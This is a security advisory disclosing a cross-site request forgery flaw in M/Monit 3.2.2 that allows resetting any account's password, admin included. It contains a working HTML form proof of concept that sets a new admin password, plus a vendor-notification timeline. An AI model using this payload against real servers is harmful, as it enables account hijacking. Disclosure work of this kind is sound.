M/Monit 3.2.2 Cross Site Request Forgery

`Application: M/Monit 3.2.2  
Author: Dolev Farhi @dolevff  
Date: 13.9.2014  
Relevant CVEs: CVE-2014-6409, CVE-2014-6607  
Vulnerable version: <= 3.2.2  
  
  
  
M/Monit is an Easy, proactive monitoring of Unix systems, network and   
cloud services.  
  
1. Vulnerability Description:  
Account hijack via cross-site request forgery (CVE-2014-6409,   
CVE-2014-6607)  
It was found that M/Monit latest version is vulnerable to CSRF attacks.   
it is possible to reset the password of any user account (admin/user)  
on the system without needing to know the current password of the   
attacked account, due to missing password change verification mechanism.  
2. Proof of concept  
<html> <div align="center"> <pre> <h2> CSRF poc M/monit </h2> <body>   
<form action="http://mmonit_server:8080/admin/users/update"   
method="POST"> <input type="hidden" name="fullname"   
value="Administrator" /> <input type="hidden" name="password"   
value="attacker_pass" /> <input type="hidden" name="email"   
value="[email protected]" /> <input type="hidden" name="admin"   
value="on" /> <input type="hidden" name="uname" value="admin" /> <input   
type="submit" name="submit" value="submit" /> </form> </body> </div>   
</html>  
  
3. Mitigation  
Software vendor confirmed the issue, and a fix might be released in the   
future.  
4. Time line:  
15.9 - Found vulnerabilities  
15.9 - Notified software vendor  
15.9 - CVE Requested  
17.9 - CVEs Assigned  
18.9 - Vendor confirmed security issues,  
release will be released in the future  
19.9 - public disclosure  
  
- Discovered by Dolev Farhi, F5 Networks  
  
  
`